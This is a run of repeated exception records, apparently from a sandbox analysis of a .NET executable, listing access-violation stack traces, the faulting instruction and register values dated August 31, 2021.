registers.edx: 0 registers.ebx: 37871032 registers.esi: 37562064 registers.ecx: 1912425774	1
__exception__ Aug. 31, 2021, 11:11 a.m.	stacktrace: 0xad0ea0 0xad0bf2 0xad043b DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72f92652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72fa264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72fa2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x730574ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x73057610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x730e1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x730e1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x730e1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x730e416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73f3f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73fb7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73fb4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77b19ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77b19ea5 exception.instruction_r: 8b 42 04 3b 45 dc 0f 95 c0 0f b6 c0 85 c0 75 1b exception.instruction: mov eax, dword ptr [edx + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xad13ac registers.esp: 2355804 registers.edi: 37940640 registers.eax: 0 registers.ebp: 2355876 registers.edx: 0 registers.ebx: 37871140 registers.esi: 37562064 registers.ecx: 1912425774	1
__exception__ Aug. 31, 2021, 11:11 a.m.	stacktrace: 0xad0ea0 0xad0bf2 0xad043b DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72f92652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72fa264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72fa2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x730574ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x73057610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x730e1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x730e1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x730e1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x730e416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73f3f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73fb7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73fb4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77b19ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77b19ea5 exception.instruction_r: 8b 42 04 3b 45 dc 0f 95 c0 0f b6 c0 85 c0 75 1b exception.instruction: mov eax, dword ptr [edx + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xad13ac registers.esp: 2355804 registers.edi: 37947856 registers.eax: 0 registers.ebp: 2355876 registers.edx: 0 registers.ebx: 37871248 registers.esi: 37562064 registers.ecx: 1912425774	1
__exception__ Aug. 31, 2021, 11:11 a.m.	stacktrace: 0xad0ea0 0xad0bf2 0xad043b DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72f92652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72fa264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72fa2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x730574ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x73057610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x730e1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x730e1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x730e1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x730e416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73f3f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73fb7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73fb4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77b19ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77b19ea5 exception.instruction_r: 8b 42 04 3b 45 dc 0f 95 c0 0f b6 c0 85 c0 75 1b exception.instruction: mov eax, dword ptr [edx + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xad13ac registers.esp: 2355804 registers.edi: 37955072 registers.eax: 0 registers.ebp: 2355876 registers.edx: 0 registers.ebx: 37871356 registers.esi: 37562064 registers.ecx: 1912425774	1
__exception__ Aug. 31, 2021, 11:11 a.m.	stacktrace: 0xad0ea0 0xad0bf2 0xad043b DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72f92652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72fa264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72fa2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x730574ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x73057610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x730e1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x730e1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x730e1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x730e416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73f3f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73fb7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73fb4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77b19ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77b19ea5 exception.instruction_r: 8b 42 04 3b 45 dc 0f 95 c0 0f b6 c0 85 c0 75 1b exception.instruction: mov eax, dword ptr [edx + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xad13ac registers.esp: 2355804 registers.edi: 37962288 registers.eax: 0 registers.ebp: 2355876 registers.edx: 0 registers.ebx: 37871464 registers.esi: 37562064 registers.ecx: 1912425774	1
__exception__ Aug. 31, 2021, 11:11 a.m.	stacktrace: 0xad0ea0 0xad0bf2 0xad043b DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72f92652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72fa264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72fa2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x730574ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x73057610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x730e1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x730e1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x730e1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x730e416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73f3f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73fb7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73fb4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77b19ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77b19ea5 exception.instruction_r: 8b 42 04 3b 45 dc 0f 95 c0 0f b6 c0 85 c0 75 1b exception.instruction: mov eax, dword ptr [edx + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xad13ac registers.esp: 2355804 registers.edi: 37969504 registers.eax: 0 registers.ebp: 2355876 registers.edx: 0 registers.ebx: 37871572 registers.esi: 37562064 registers.ecx: 1912425774	1
__exception__ Aug. 31, 2021, 11:11 a.m.	stacktrace: 0x5e0ea0 0x5e0bf2 0x5e043b DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x728f2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7290264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72902e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x729b74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x729b7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72a41dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72a41e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72a41f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x72a4416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x7435f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73fb7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73fb4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77b19ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77b19ea5 exception.instruction_r: 8b 42 04 3b 45 dc 0f 95 c0 0f b6 c0 85 c0 75 1b exception.instruction: mov eax, dword ptr [edx + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x5e13ac registers.esp: 5042732 registers.edi: 43113684 registers.eax: 0 registers.ebp: 5042804 registers.edx: 0 registers.ebx: 43112152 registers.esi: 39330764 registers.ecx: 1905478958	1
__exception__ Aug. 31, 2021, 11:11 a.m.	stacktrace: 0x5e0ea0 0x5e0bf2 0x5e043b DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x728f2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7290264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72902e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x729b74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x729b7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72a41dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72a41e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72a41f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x72a4416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x7435f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73fb7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73fb4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77b19ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77b19ea5 exception.instruction_r: 8b 42 04 3b 45 dc 0f 95 c0 0f b6 c0 85 c0 75 1b exception.instruction: mov eax, dword ptr [edx + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x5e13ac registers.esp: 5042732 registers.edi: 43139148 registers.eax: 0 registers.ebp: 5042804 registers.edx: 0 registers.ebx: 43112260 registers.esi: 39330764 registers.ecx: 1905478958	1
__exception__ Aug. 31, 2021, 11:11 a.m.	stacktrace: 0x5e0ea0 0x5e0bf2 0x5e043b DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x728f2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7290264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72902e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x729b74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x729b7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72a41dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72a41e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72a41f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x72a4416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x7435f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73fb7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73fb4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77b19ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77b19ea5 exception.instruction_r: 8b 42 04 3b 45 dc 0f 95 c0 0f b6 c0 85 c0 75 1b exception.instruction: mov eax, dword ptr [edx + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x5e13ac registers.esp: 5042732 registers.edi: 43146364 registers.eax: 0 registers.ebp: 5042804 registers.edx: 0 registers.ebx: 43112368 registers.esi: 39330764 registers.ecx: 1905478958	1
__exception__ Aug. 31, 2021, 11:11 a.m.	stacktrace: 0x5e0ea0 0x5e0bf2 0x5e043b DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x728f2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7290264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72902e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x729b74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x729b7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72a41dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72a41e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72a41f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x72a4416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x7435f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73fb7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73fb4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77b19ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77b19ea5 exception.instruction_r: 8b 42 04 3b 45 dc 0f 95 c0 0f b6 c0 85 c0 75 1b exception.instruction: mov eax, dword ptr [edx + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x5e13ac registers.esp: 5042732 registers.edi: 43153580 registers.eax: 0 registers.ebp: 5042804 registers.edx: 0 registers.ebx: 43112476 registers.esi: 39330764 registers.ecx: 1905478958	1
__exception__ Aug. 31, 2021, 11:11 a.m.	stacktrace: 0x5e0ea0 0x5e0bf2 0x5e043b DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x728f2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7290264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72902e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x729b74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x729b7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72a41dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72a41e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72a41f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x72a4416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x7435f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73fb7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73fb4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77b19ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77b19ea5 exception.instruction_r: 8b 42 04 3b 45 dc 0f 95 c0 0f b6 c0 85 c0 75 1b exception.instruction: mov eax, dword ptr [edx + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x5e13ac registers.esp: 5042732 registers.edi: 43160796 registers.eax: 0 registers.ebp: 5042804 registers.edx: 0 registers.ebx: 43112584 registers.esi: 39330764 registers.ecx: 1905478958	1
__exception__ Aug. 31, 2021, 11:11 a.m.	stacktrace: 0x5e0ea0 0x5e0bf2 0x5e043b DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x728f2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7290264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72902e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x729b74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x729b7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72a41dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72a41e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72a41f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x72a4416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x7435f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73fb7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73fb4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77b19ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77b19ea5 exception.instruction_r: 8b 42 04 3b 45 dc 0f 95 c0 0f b6 c0 85 c0 75 1b exception.instruction: mov eax, dword ptr [edx + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x5e13ac registers.esp: 5042732 registers.edi: 43168012 registers.eax: 0 registers.ebp: 5042804 registers.edx: 0 registers.ebx: 43112692 registers.esi: 39330764 registers.ecx: 1905478958	1
__exception__ Aug. 31, 2021, 11:11 a.m.	stacktrace: 0x5e0ea0 0x5e0bf2 0x5e043b DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x728f2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7290264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72902e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x729b74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x729b7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72a41dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72a41e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72a41f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x72a4416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x7435f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73fb7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73fb4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77b19ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77b19ea5 exception.instruction_r: 8b 42 04 3b 45 dc 0f 95 c0 0f b6 c0 85 c0 75 1b exception.instruction: mov eax, dword ptr [edx + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x5e13ac registers.esp: 5042732 registers.edi: 43175228 registers.eax: 0 registers.ebp: 5042804 registers.edx: 0 registers.ebx: 43112800 registers.esi: 39330764 registers.ecx: 1905478958	1
__exception__ Aug. 31, 2021, 11:11 a.m.	stacktrace: 0x5e0ea0 0x5e0bf2 0x5e043b DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x728f2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7290264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72902e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x729b74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x729b7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72a41dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72a41e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72a41f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x72a4416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x7435f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73fb7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73fb4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77b19ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77b19ea5 exception.instruction_r: 8b 42 04 3b 45 dc 0f 95 c0 0f b6 c0 85 c0 75 1b exception.instruction: mov eax, dword ptr [edx + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x5e13ac registers.esp: 5042732 registers.edi: 43182444 registers.eax: 0 registers.ebp: 5042804 registers.edx: 0 registers.ebx: 43112908 registers.esi: 39330764 registers.ecx: 1905478958	1
__exception__ Aug. 31, 2021, 11:11 a.m.	stacktrace: 0x5e0ea0 0x5e0bf2 0x5e043b DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x728f2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7290264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72902e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x729b74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x729b7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72a41dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72a41e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72a41f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x72a4416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x7435f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73fb7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73fb4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77b19ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77b19ea5 exception.instruction_r: 8b 42 04 3b 45 dc 0f 95 c0 0f b6 c0 85 c0 75 1b exception.instruction: mov eax, dword ptr [edx + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x5e13ac registers.esp: 5042732 registers.edi: 43189660 registers.eax: 0 registers.ebp: 5042804 registers.edx: 0 registers.ebx: 43113016 registers.esi: 39330764 registers.ecx: 1905478958	1
__exception__ Aug. 31, 2021, 11:11 a.m.	stacktrace: 0x5e0ea0 0x5e0bf2 0x5e043b DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x728f2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7290264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72902e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x729b74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x729b7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72a41dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72a41e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72a41f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x72a4416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x7435f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73fb7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73fb4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77b19ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77b19ea5 exception.instruction_r: 8b 42 04 3b 45 dc 0f 95 c0 0f b6 c0 85 c0 75 1b exception.instruction: mov eax, dword ptr [edx + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x5e13ac registers.esp: 5042732 registers.edi: 43196876 registers.eax: 0 registers.ebp: 5042804 registers.edx: 0 registers.ebx: 43113124 registers.esi: 39330764 registers.ecx: 1905478958	1
